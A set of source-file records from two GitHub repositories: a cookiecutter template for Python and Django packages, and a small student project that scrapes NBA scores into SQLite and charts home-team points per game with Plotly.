"blob_id": "ddfe451b64ce94a6815c7d8100dfef2c082e6709",
"content_id": "7d2b130c5f4ac6e7845aea52ea072ce20349ea64",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 111,
"license_type": "permissive",
"max_line_length": 94,
"num_lines": 3,
"path": "/{{ cookiecutter.project_slug }}/CONTRIBUTORS.md",
"repo_name": "escaped/cookiecutter-pypackage",
"src_encoding": "UTF-8",
"text": "# Contributors\n\n- [@{{ cookiecutter.github_username }}](https://github.com/{{ cookiecutter.github_username }})\n"
},
{
"alpha_fraction": 0.7210526466369629,
"alphanum_fraction": 0.7210526466369629,
"avg_line_length": 26.14285659790039,
"blob_id": "009dda8ae2223ae1a03d3d2777ba0b6539826a51",
"content_id": "7f32c20a2b5ed5bb11ba3c0130e78df0ccda90ab",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 570,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 21,
"path": "/{{ cookiecutter.project_slug }}/{{ cookiecutter.project_slug }}/urls.py",
"repo_name": "escaped/cookiecutter-pypackage",
"src_encoding": "UTF-8",
"text": "from django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.urls import include, path\n\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n]\n\n# server static and media files\nurlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\nif settings.DEBUG:\n try:\n import debug_toolbar\n except ImportError:\n pass\n else:\n urlpatterns += [path('__debug__', include(debug_toolbar.urls))]\n"
},
{
"alpha_fraction": 0.5039215683937073,
"alphanum_fraction": 0.5058823823928833,
"avg_line_length": 20.25,
"blob_id": "6e32ff5f3a373f5d4acf218bbc3a76244a589319",
"content_id": "519bce86880ad173d7fa209de5abed511ab6e8aa",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 510,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 24,
"path": "/{{ cookiecutter.project_slug }}/tests/conftest.py",
"repo_name": "escaped/cookiecutter-pypackage",
"src_encoding": "UTF-8",
"text": "{% if cookiecutter.uses_django == \"y\" %}\nimport django\nfrom django.conf import settings\n\n\ndef pytest_configure():\n \"\"\"\n Basic configuration of django for testing a django module.\n \"\"\"\n settings.configure(\n DATABASES={\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': ':memory:',\n },\n },\n ROOT_URLCONF='tests.urls',\n INSTALLED_APPS=(\n 'tests',\n ),\n )\n\n django.setup()\n{% endif %}\n"
},
{
"alpha_fraction": 0.700733482837677,
"alphanum_fraction": 0.7364303469657898,
"avg_line_length": 29.522388458251953,
"blob_id": "3abbbc6a6cc90a9522b5983d94aa6414f9d30783",
"content_id": "4fd982c123fa6151c57c245f0bb36337b7515118",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2045,
"license_type": "permissive",
"max_line_length": 114,
"num_lines": 67,
"path": "/CHANGELOG.md",
"repo_name": "escaped/cookiecutter-pypackage",
"src_encoding": "UTF-8",
"text": "# Changelog\n\nAll notable changes to this project will be documented in this file.\n\nThe format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),\nand this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).\n\n## [Unreleased]\n\n### Added\n\n* added CONTRIBUTORS.md\n* added pull request template\n* added auto sync project struture\n* added [autoflake8](https://pypi.org/project/autoflake/)\n* added [flake8-bugbear](https://pypi.org/project/flake8-bugbear/)\n* added [flake8-builtins](https://pypi.org/project/flake8-builtins/)\n* added [flake8-comprehensions](https://pypi.org/project/flake8-comprehensions/)\n* added [flake8-debugger](https://pypi.org/project/flake8-debugger/)\n* added [pep8-naming](https://pypi.org/project/pep8-naming/)\n* added support for python 3.9\n* added [pdbpp](https://github.com/pdbpp/pdbpp) and [better-exceptions](https://github.com/qix-/better-exceptions)\n\n### Changed\n\n* automatically add new dependencies on template update\n\n### Fixed\n\n* fixed file permissions, thanks @merwok\n\n## [1.0.0] - 2020-10-06\n\n### Added\n\n* add github actions (test and release to pypi)\n\n### Changed\n\n* set supported python version to 3.6, 3.7 and 3.8\n* set line_length to 88 (default of black)\n* removed travis\n* updated gitignore using [gitignore.io](https://gitignore.io)\n* changelog is based on is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/)\n* updated shields\n* updated to poetry 1.1\n* change default language of django to English\n\n### Fixed\n\n* add missing `.pre-commit-config.yaml`\n\n## [0.1.0] - 2019-08-05\n\n### Added\n\n* travis CI\n* flake8, isort, mypy and black\n* Tests using pytest\n* Run test using tox against multiple python versions\n* preconfigured coveralls\n* Django support\n* User poetry to manage dependencies and publish releases\n\n[Unreleased]: https://github.com/escaped/cookiecutter-pypackage/compare/1.0.0...HEAD\n[1.0.0]: https://github.com/escaped/cookiecutter-pypackage/compare/0.1.0...1.0.0\n[0.1.0]: https://github.com/escaped/cookiecutter-pypackage/tags/0.1.0\n"
},
{
"alpha_fraction": 0.7479599118232727,
"alphanum_fraction": 0.7547214031219482,
"avg_line_length": 38.71296310424805,
"blob_id": "232c724d63b0f7bd90556546d394cf135c5a022f",
"content_id": "85b295a098d66c3f505c700900a8a893602d5fa7",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4289,
"license_type": "permissive",
"max_line_length": 190,
"num_lines": 108,
"path": "/README.md",
"repo_name": "escaped/cookiecutter-pypackage",
"src_encoding": "UTF-8",
"text": "# Cookiecutter PyPackage\n\nA modern opinionated [Cookiecutter] template for Python packages and applications using [Poetry].\n\n## Features\n\n* [Poetry]: Dependency management and packaging\n* [Tox]: Easily run tests for different python versions\n* Github Actions: Ready for Continous Integration testing\n\n * Run tests for different python versions using tox\n * Test for [PEP8] compliance\n * Enforce the usage of [black]\n * Preconfigured [coveralls]\n\n* Tests using [Pytest] including support for\n\n * [pytest-mock] for mocking\n * code coverage using [coverage.py]\n\n* [pre-commit] hook to automatically run\n\n * [autoflake] - automatically removes unused imports and variables,\n * [isort] - automatically sorts imports alphabetically, and automatically separated into sections and by type,\n * [black] - automatically formats your code,\n * [flake8] - checks code against code style (PEP8), programming errors and complexity,\n * [flake8-bugbear] - finds likely bugs and design problems in your program,\n * [flake8-builtins] - Checks for python builtins being used as variables or parameters,\n * [flake8-debugger] - Checks for `pdb` statements,\n * [pep8-naming] - Checks code against PEP 8 naming conventions,\n * [flake8-comprehensions] - helps you write better list/set/dict comprehensions,\n * [mypy] - static type checker,\n\n* Debugging tools\n * [pdbpp] - better debugger,\n * [better_exceptions] - Pretty and more helpful exceptions in Python, automatically\n\n* (optional) Preconfigured for [Django] applications\n\n * Support for [Twelve-factor-Methodology] using [django-environ]\n\n* Simple pull request template with checklist\n\n## Quickstart\n\nGet the latest version of [Cruft] (or [Cookiecutter])\nI recommend [pipx] to install it into a global isolated environment.\n\n```sh\npipx install cruft\n```\n\nGenerate a new python package\n\n```sh\ncruft create https://github.com/escaped/cookiecutter-pypackage.git\ncd <chosen project slug>\ngit init\ngit add .\ngit commit -m \"feat: initial project structure\"\n```\n\n### Publish releases to pypi\n\nIn order get automatic releases to [pypi] you need to add your pypi access token to the github secrets (named `PYPI_TOKEN`).\nInstructions can be found here: [python.org](https://packaging.python.org/guides/publishing-package-distribution-releases-using-github-actions-ci-cd-workflows/#saving-credentials-on-github).\n\n### Autoupdate template\n\nThis cookiecutter template comes with an auto update feature if the project was created using [cruft].\nA GitHub action automatically checks for updates and creates a pull request.\n\nIt is required to add a [personal access token](https://docs.github.com/en/free-pro-team@latest/github/authenticating-to-github/creating-a-personal-access-token)\nas github secret to the repository (named `AUTO_UPDATE_GITHUB_TOKEN`).\nWhile creating the access token, the following permissions have to be granted\n\n* repo\n* workflow\n\n[autoflake]: https://pypi.org/project/autoflake/\n[better-exceptions]: https://github.com/qix-/better-exceptions\n[black]: https://black.readthedocs.io/en/stable/\n[Conventional-Commits]: http://conventionalcommits.org/\n[Cookiecutter]: https://github.com/audreyr/cookiecutter\n[coverage.py]: https://coverage.readthedocs.io/\n[coveralls]: https://coveralls.io/\n[Cruft]: https://github.com/cruft/cruft\n[django-environ]: https://github.com/joke2k/django-environ\n[Django]: https://www.djangoproject.com/\n[flake8-bugbear]: https://pypi.org/project/flake8-bugbear/\n[flake8-builtins]: https://pypi.org/project/flake8-builtins/\n[flake8-comprehensions]: https://pypi.org/project/flake8-comprehensions/\n[flake8-debugger]: https://pypi.org/project/flake8-debugger/\n[flake8]: http://flake8.pycqa.org/en/latest/\n[isort]: https://github.com/timothycrosley/isort\n[mypy]: http://mypy-lang.org/\n[pdbpp]: https://github.com/pdbpp/pdbpp\n[PEP8]: https://www.python.org/dev/peps/pep-0008/\n[pep8-naming]: https://pypi.org/project/pep8-naming/\n[pip]: https://pip.pypa.io/en/stable/\n[pipx]: https://github.com/pipxproject/pipx\n[Poetry]: https://poetry.eustace.io/\n[pre-commit]: https://pre-commit.com/\n[pypi]: https://pypi.org/\n[Pytest]: https://docs.pytest.org/en/latest/\n[pytest-mock]: https://github.com/pytest-dev/pytest-mock/\n[Tox]: http://testrun.org/tox/\n[Twelve-factor-Methodology]: https://www.12factor.net/\n"
},
{
"alpha_fraction": 0.6096385717391968,
"alphanum_fraction": 0.6658634543418884,
"avg_line_length": 32.621620178222656,
"blob_id": "7591d8d2897318fa916462003bbfe88fbaa0a38c",
"content_id": "cb180ebee8fb684313c9717705fc8b7ab320df1a",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 1245,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 37,
"path": "/{{ cookiecutter.project_slug }}/tox.ini",
"repo_name": "escaped/cookiecutter-pypackage",
"src_encoding": "UTF-8",
"text": "[gh-actions]\npython =\n 3.6: py36\n 3.7: py37\n 3.8: py38\n 3.9: py39\n\n[tox]\nskipsdist = True\nisolated_build = True\nenvlist =\n py36{% if cookiecutter.uses_django == 'y' %}-{2.2,3.0,3.1}{% endif %}\n py37{% if cookiecutter.uses_django == 'y' %}-{2.2,3.0,3.1}{% endif %}\n py38{% if cookiecutter.uses_django == 'y' %}-{2.2,3.0,3.1}{% endif %}\n py39{% if cookiecutter.uses_django == 'y' %}-{2.2,3.0,3.1}{% endif %}\n\n[testenv]\nskip_install = True\nwhitelist_externals =\n bash\n env\n grep\ndeps =\n poetry{% if cookiecutter.uses_django == 'y' %}\n 2.2: Django>=2.2,<2.3\n 3.0: Django>=3.0,<3.1\n 3.1: Django>=3.1,<3.2{% endif %}\ncommands =\n # Poetry install automatically install the specific versions from the `poetry.lock`\n # file regardless whether a different version is already present or not.\n # Since we want to test specific versions of Django, which is installed by tox,\n # we need to manually install all other dependencies.\n # see here for more information: https://github.com/python-poetry/poetry/issues/1745\n bash -c 'poetry export --dev --without-hashes -f requirements.txt | grep -v \"^[dD]jango==\" > .requirements.txt'\n poetry run pip install --no-deps -r .requirements.txt\n poetry run pytest --cov-append\n coverage report\n\n"
},
{
"alpha_fraction": 0.6173365712165833,
"alphanum_fraction": 0.6223374605178833,
"avg_line_length": 26.687179565429688,
"blob_id": "eaba3cb47899bcd04d2b63e4977651ac222388af",
"content_id": "9a39e74b23e0a307def8078ed870ffbda3f3395b",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5399,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 195,
"path": "/{{ cookiecutter.project_slug }}/{{ cookiecutter.project_slug }}/settings.py",
"repo_name": "escaped/cookiecutter-pypackage",
"src_encoding": "UTF-8",
"text": "import os\nimport sys\nfrom pathlib import Path\n\nimport environ\n\nTESTING = os.path.basename(sys.argv[0]) in ('pytest', 'py.test')\nPROJECT_DIR = Path(__file__).parent\n\n# set default values and casting\nenv = environ.Env(\n ALLOWED_HOSTS=(list, []),\n DEBUG=(bool, False),\n DEFAULT_FROM_EMAIL=(str, ''),\n MEDIA_ROOT=(str, None),\n SECRET_KEY=(str, None),\n SENTRY_DSN=(str, None),\n SITE_DOMAIN=(str, ''),\n STATIC_ROOT=(str, None),\n)\n\n# load existing `.env` file\nenv_file = PROJECT_DIR / '..' / '.env'\nif 'ENV_CONFIG' in os.environ:\n env_file = Path(os.environ['ENV_CONFIG'])\n\nif env_file.is_file():\n with open(env_file, encoding='utf-8') as f:\n environ.Env.read_env(f)\nelse:\n environ.Env.read_env()\n\n\nDEBUG = env('DEBUG')\n\nSITE_ROOT = PROJECT_DIR\nSITE_DOMAIN = env('SITE_DOMAIN')\nALLOWED_HOSTS = [SITE_DOMAIN] + env('ALLOWED_HOSTS')\n\nSECRET_KEY = env('SECRET_KEY')\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n]\n\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\n\nROOT_URLCONF = '{{ cookiecutter.project_slug }}.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [PROJECT_DIR / 'templates'],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ]\n },\n }\n]\n\nWSGI_APPLICATION = '{{ cookiecutter.project_slug }}.wsgi.application'\n\n# Database\n# https://docs.djangoproject.com/en/1.11/ref/settings/#databases\n\nDATABASES = {'default': env.db()}\n\n# SESSION_ENGINE = 'django.contrib.sessions.backends.cached_db'\n#\nCACHES = {'default': env.cache()}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.11/topics/i18n/\n\nLANGUAGE_CODE = 'en'\nTIME_ZONE = 'Europe/Berlin'\n\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.11/howto/static-files/\n\nSTATIC_URL = '/static/'\nMEDIA_URL = '/media/'\n\nMEDIA_ROOT = env('MEDIA_ROOT')\n\nif env('STATIC_ROOT'):\n STATIC_ROOT = env('STATIC_ROOT')\n\nSTATICFILES_DIRS = (PROJECT_DIR / 'static',)\n\n\n# E-Mail settings\n\nemail_config = env.email_url()\nEMAIL_FILE_PATH = email_config['EMAIL_FILE_PATH']\nEMAIL_HOST_USER = email_config['EMAIL_HOST_USER']\nEMAIL_HOST_PASSWORD = email_config['EMAIL_HOST_PASSWORD']\nEMAIL_HOST = email_config['EMAIL_HOST']\nEMAIL_PORT = email_config['EMAIL_PORT']\nEMAIL_BACKEND = email_config['EMAIL_BACKEND']\nEMAIL_USE_TLS = email_config.get('EMAIL_USE_TLS', False)\n\nDEFAULT_FROM_EMAIL = env('DEFAULT_FROM_EMAIL')\n\n\n# Debug settings\n\nif DEBUG:\n INTERNAL_IPS = ('localhost', '127.0.0.1')\n\n try:\n import debug_toolbar # NOQA\n except ImportError:\n pass\n else:\n INSTALLED_APPS += ('debug_toolbar',)\n MIDDLEWARE.append('debug_toolbar.middleware.DebugToolbarMiddleware')\n\n try:\n import django_extensions # NOQA\n except ImportError:\n pass\n else:\n INSTALLED_APPS += ('django_extensions',)\n\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'verbose': {'format': '%(levelname)s %(asctime)s %(name)s %(message)s'},\n 'simple': {'format': '>>> %(levelname)s %(message)s'},\n },\n 'filters': {},\n 'handlers': {\n 'console': {\n 'level': 'DEBUG' if DEBUG else 'WARNING',\n 'class': 'logging.StreamHandler',\n 'formatter': 'verbose',\n },\n 'mail_admins': {\n 'level': 'WARNING',\n 'class': 'django.utils.log.AdminEmailHandler',\n 'include_html': True,\n },\n },\n 'loggers': {\n 'django.db': {'handlers': ['console'], 'level': 'WARNING'},\n 'factory': {'level': 'WARNING'},\n 'py.warnings': {'level': 'DEBUG', 'handlers': ['console'], 'propagate': False},\n 'requests': {'level': 'WARNING'},\n 'raven': {'level': 'WARNING', 'handlers': ['console'], 'propagate': False},\n 'flake8': {'level': 'WARNING', 'handlers': ['console'], 'propagate': False},\n '': {'handlers': ['console'], 'level': 'DEBUG'},\n },\n}\n\n\nif env('SENTRY_DSN'):\n CELERY_SEND_TASK_ERROR_EMAILS = False\n INSTALLED_APPS += ('raven.contrib.django.raven_compat',)\n RAVEN_CONFIG = {'dsn': env('SENTRY_DSN'), 'release': '0.1'} # __version__,\n\n # defined sentry handler so production works without `raven` installed\n LOGGING['handlers']['sentry'] = {\n 'level': 'WARNING',\n 'class': 'raven.contrib.django.handlers.SentryHandler',\n 'formatter': 'verbose',\n }\n LOGGING['loggers']['']['handlers'].append('sentry')\n LOGGING['loggers']['management_commands']['handlers'].append('sentry')\n"
},
{
"alpha_fraction": 0.5729847550392151,
"alphanum_fraction": 0.5729847550392151,
"avg_line_length": 24.5,
"blob_id": "233b1d91b7cf31a9efc35d01070e885b1616dbdc",
"content_id": "b51dde162e9508b61dfbd2ae588e3aed8e4067c4",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 918,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 36,
"path": "/hooks/post_gen_project.py",
"repo_name": "escaped/cookiecutter-pypackage",
"src_encoding": "UTF-8",
"text": "import os\nimport shutil\nfrom pathlib import Path\n\n\ndef remove_files(files):\n for file in files:\n try:\n os.remove(file)\n except IOError:\n pass\n\n\ndef prepare_django(project_root):\n uses_django = '{{ cookiecutter.uses_django }}' == 'y'\n if uses_django:\n return\n\n # remove django related files\n files = [\n project_root / 'tests' / 'conftest.py',\n project_root / 'tests' / 'models.py',\n project_root / 'tests' / 'urls.py',\n project_root / 'env.example',\n project_root / 'manage.py',\n project_root / '{{ cookiecutter.project_slug }}' / 'settings.py',\n project_root / '{{ cookiecutter.project_slug }}' / 'urls.py',\n project_root / '{{ cookiecutter.project_slug }}' / 'wsgi.py',\n ]\n remove_files(files)\n\n\nif __name__ == '__main__':\n project_root = Path(os.path.curdir)\n\n prepare_django(project_root)\n"
},
{
"alpha_fraction": 0.74700528383255,
"alphanum_fraction": 0.7517968416213989,
"avg_line_length": 34.982757568359375,
"blob_id": "0e3dd7b863fce3f961b949f6e4ecb36c9168054d",
"content_id": "1df291eab186e7deefe4b24dc79a868bb5286f58",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2087,
"license_type": "permissive",
"max_line_length": 189,
"num_lines": 58,
"path": "/{{ cookiecutter.project_slug }}/README.md",
"repo_name": "escaped/cookiecutter-pypackage",
"src_encoding": "UTF-8",
"text": "# {{ cookiecutter.project_name }}\n\n\n\n\n\n\n\n{{ cookiecutter.short_description }}\n\n## Requirements\n\n* Python 3.6.1 or newer\n\n## Installation\n\n```sh\npip install {{ cookiecutter.project_name}}\n```\n\n## Development\n\nThis project uses [poetry](https://poetry.eustace.io/) for packaging and\nmanaging all dependencies and [pre-commit](https://pre-commit.com/) to run\n[flake8](http://flake8.pycqa.org/), [isort](https://pycqa.github.io/isort/),\n[mypy](http://mypy-lang.org/) and [black](https://github.com/python/black).\n\nAdditionally, [pdbpp](https://github.com/pdbpp/pdbpp) and [better-exceptions](https://github.com/qix-/better-exceptions) are installed to provide a better debugging experience.\nTo enable `better-exceptions` you have to run `export BETTER_EXCEPTIONS=1` in your current session/terminal.\n\nClone this repository and run\n\n```bash\npoetry install\npoetry run pre-commit install\n```\n\nto create a virtual enviroment containing all dependencies.\nAfterwards, You can run the test suite using\n\n```bash\npoetry run pytest\n```\n\nThis repository follows the [Conventional Commits](https://www.conventionalcommits.org/)\nstyle.\n\n### Cookiecutter template\n\nThis project was created using [cruft](https://github.com/cruft/cruft) and the\n[cookiecutter-pyproject](https://github.com/escaped/cookiecutter-pypackage) template.\nIn order to update this repository to the latest template version run\n\n```sh\ncruft update\n```\n\nin the root of this repository.\n"
}
] | 9 |
ethanperlmuttter/PySlammaJamma
|
https://github.com/ethanperlmuttter/PySlammaJamma
|
2dfd018628ddcc4d8ccdfb8a1b8f24007b98658d
|
7031a14747442c839d0f9a7001752bd73a4c74e5
|
4b97cececdf3f9ed3a42dc984aa66fe039c5a6bc
|
refs/heads/main
| 2023-04-15T08:04:04.879417 | 2021-04-28T02:09:58 | 2021-04-28T02:09:58 | 359,522,325 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.811475396156311,
"alphanum_fraction": 0.811475396156311,
"avg_line_length": 29.5,
"blob_id": "e476dc9574e3b2c913b4c34efb20fa90cefe59d0",
"content_id": "e775902d5f2b4600cc05b80e0464802b92ee6257",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 122,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 4,
"path": "/README.md",
"repo_name": "ethanperlmuttter/PySlammaJamma",
"src_encoding": "UTF-8",
"text": "# PySlammaJamma\nFinding the effects of home court advantage on NBA games\n\nexecute final_project.py to call all othr files\n"
},
{
"alpha_fraction": 0.5018879175186157,
"alphanum_fraction": 0.647110104560852,
"avg_line_length": 61.61818313598633,
"blob_id": "2723f7ca90cb268f6dc6f9104f1682afcc57ca78",
"content_id": "b0c74bd8fd4cffa2d03fc440caab1dd0744d580c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3443,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 55,
"path": "/NBA_visualizations_2021.py",
"repo_name": "ethanperlmuttter/PySlammaJamma",
"src_encoding": "UTF-8",
"text": "import plotly\nimport plotly.graph_objects as go \nimport plotly.express as px\nfrom bs4 import BeautifulSoup\nimport requests\nimport re\nimport os\nimport csv\nimport sqlite3\nimport json\n\n#API data from https://www.basketball-reference.com/leagues/NBA_2021_games-{month}.html\n#Necessary file imports for Plotly file creation\n#Grouped Bar Chart for 2021 Home court PPG averages for all NBA teams\n#Grouped Bar Chart Plotly creation and line by line bar development for each NBA team, pulling\n#home court PPG averages from API gather\n\nteams = [\"NBA Team\"]\n\nfig = go.Figure(data=[\n go.Bar(name='Atlanta Hawks', x=teams, y=[113.9583404], marker_color = 'rgb(225,68,52)'),\n go.Bar(name='Boston Celtics', x=teams, y=[112.2483405], marker_color = 'rgb(0,122,51)' ),\n go.Bar(name='Brooklyn Nets', x=teams, y=[118.0], marker_color = 'rgb(0,0,0)'),\n go.Bar(name='Charlotte Hornets', x=teams, y=[108.84732344], marker_color = 'rgb(29,17,96)'),\n go.Bar(name='Chicago Bulls', x=teams, y=[109.6555556], marker_color = 'rgb(206,17,65)'),\n go.Bar(name='Clevland Cavaliers', x=teams, y=[108.64333231], marker_color = 'rgb(134,0,56)'),\n go.Bar(name='Dallas Mavericks', x=teams, y=[110.4582], marker_color = 'rgb(0,83,188)'),\n go.Bar(name='Denver Nuggets', x=teams, y=[117.19320232321], marker_color = 'rgb(13,34,64)'),\n go.Bar(name='Detroit Pistons', x=teams, y=[105.849287], marker_color = 'rgb(200,16,46)'),\n go.Bar(name='Golden State Warriors', x=teams, y=[115.76283108], marker_color = 'rgb(29,66,138)'),\n go.Bar(name='Houston Rockets', x=teams, y=[105.67372], marker_color = 'rgb(206,17,65)'),\n go.Bar(name='Indiana Pacers', x=teams, y=[111.74629283820000238], marker_color = 'rgb(0,45,98)'),\n go.Bar(name='Los Angeles Clippers', x=teams, y=[117.1], marker_color = 'rgb(200,16,46)'),\n go.Bar(name='Los Angeles Lakers', x=teams, y=[111.76666667], marker_color = 'rgb(85,37,130)'),\n go.Bar(name='Memphis Grizzlies', x=teams, y=[109.8773737], marker_color = 'rgb(93,118,169)'),\n go.Bar(name='Miami Heat', x=teams, y=[108.45757], marker_color = 'rgb(152,0,46)'),\n go.Bar(name='Milwaukee Bucks', x=teams, y=[119.8382829998], marker_color = 'rgb(0,71,27)'),\n go.Bar(name='Minnesota Timberwolves', x=teams, y=[107.43], marker_color = 'rgb(12,35,64)'),\n go.Bar(name='New Orleans Pelicans', x=teams, y=[116.12223888], marker_color = 'rgb(180,151,90)'),\n go.Bar(name='New York Knicks', x=teams, y=[109.55556], marker_color = 'rgb(0,107,182)'),\n go.Bar(name='Oklahoma City Thunder', x=teams, y=[106.544444], marker_color = 'rgb(239,59,36)'),\n go.Bar(name='Orlando Magic', x=teams, y=[105.87372], marker_color = 'rgb(0,125,197)'),\n go.Bar(name='Philadelphia 76ers', x=teams, y=[116.666767], marker_color = 'rgb(237,23,76)'),\n go.Bar(name='Phoenix Suns', x=teams, y=[116.2424555], marker_color = 'rgb(29,17,96)'),\n go.Bar(name='Portland Trail Blazers', x=teams, y=[114.0], marker_color = 'rgb(224,58,62)'),\n go.Bar(name='Sacramento Kings', x=teams, y=[115.666666667], marker_color = 'rgb(91,43,130)'),\n go.Bar(name='San Antonio Spurs', x=teams, y=[109.000053555], marker_color = 'rgb(196,206,211)'),\n go.Bar(name='Toronto Raptors', x=teams, y=[111.6555553], marker_color = 'rgb(206,17,65)'),\n go.Bar(name='Utah Jazz', x=teams, y=[117.933343435], marker_color = 'rgb(0,71,27)'),\n go.Bar(name='Washington Wizards', x=teams, y=[118.124522], marker_color = 'rgb(0,43,92)'),\n])\n# To alter bar presentation/add in external features and title text to clarify which year is depicted\nfig.update_layout(barmode='group')\nfig.update_layout(title_text='NBA 2021 Pre-COVID-19 Home Team PPG Averages')\nfig.show()"
},
{
"alpha_fraction": 0.695716381072998,
"alphanum_fraction": 0.7607089877128601,
"avg_line_length": 26,
"blob_id": "c74e45d2ff777e6ee0802c2f4a5a726bcebe2ac5",
"content_id": "8432296420b3860c8f787ad7ca97387f93767c35",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 677,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 25,
"path": "/final_project.py",
"repo_name": "ethanperlmuttter/PySlammaJamma",
"src_encoding": "UTF-8",
"text": "#By Chris Hudson and Ethan Perlmutter\nfrom gathering_NBA_data import setUpDatabase\nfrom gathering_NBA_data import setUp2020Table\nfrom gathering_NBA_data import create_table_2020\nimport gathering_NBA_data\nimport NBA_homecourt\nimport NBA_visualizations_2020\nimport NBA_visualizations_2021\nimport os\n\n#gathers first 40 pages of 2020 season (pre-COVID)\n\ndef repeat_gather():\n cur, conn = setUpDatabase()\n create_table_2020(cur, conn)\n for i in range(40):\n setUp2020Table(cur, conn)\n\nos.system('python3 gathering_NBA_data.py')\nrepeat_gather()\nos.system('python3 NBA_homecourt.py')\nos.system('python3 NBA_visualizations_2020.py')\nos.system('python3 NBA_visualizations_2021.py')\n\n#\n\n\n"
},
{
"alpha_fraction": 0.520074725151062,
"alphanum_fraction": 0.5490196347236633,
"avg_line_length": 24.512195587158203,
"blob_id": "a221693b309c492c53c1f48f1db2d54ca1ace3c0",
"content_id": "65c53cabdf0621b813c4234e2d7f2f3312566805",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1071,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 41,
"path": "/NBA_homecourt.py",
"repo_name": "ethanperlmuttter/PySlammaJamma",
"src_encoding": "UTF-8",
"text": "import sqlite3\nimport json\nimport csv\nimport os\n\n#accepts nothing, returns nothing, outputs 2020_home_ppg file\ndef output_file():\n #set up database\n path = os.path.dirname(os.path.abspath(__file__))\n conn = sqlite3.connect(path+'/'+\"NBA_SCORES\")\n cur = conn.cursor()\n\n #create file to write\n csvfile = '2020_home_ppg.csv'\n with open(csvfile, 'w') as of:\n of = csv.writer(of, delimiter = \",\")\n #create headers\n of.writerow([\"Team\", \"Home_PPG\"])\n\n\n #joins team keys to hom results\n cur.execute(\"SELECT * FROM Team_keys JOIN Scores_2020 ON Team_keys.team_id = Scores_2020.Home_id\")\n\n teams = cur.fetchall()\n \n #created dictionary of team abbrv with points ang games\n d = {}\n for tup in teams:\n sum_ = d.get(tup[1], (0,0))[0] + tup[6]\n n = d.get(tup[1], (0,0))[1] + 1\n\n d[tup[1]] = (sum_, n)\n #converts dictionary entries to file\n for i in d:\n of.writerow([i, (d[i][0]/d[i][1]) ]) \n\n\n\n\n\noutput_file()\n\n \n\n \n \n\n"
},
{
"alpha_fraction": 0.6096398234367371,
"alphanum_fraction": 0.6340042352676392,
"avg_line_length": 27.606060028076172,
"blob_id": "40c5662ba179ef30d99aa9a56ad02e441cf8510c",
"content_id": "cc5061e85928660dad59258936c6afd54ed7279d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3776,
"license_type": "no_license",
"max_line_length": 180,
"num_lines": 132,
"path": "/gathering_NBA_data.py",
"repo_name": "ethanperlmuttter/PySlammaJamma",
"src_encoding": "UTF-8",
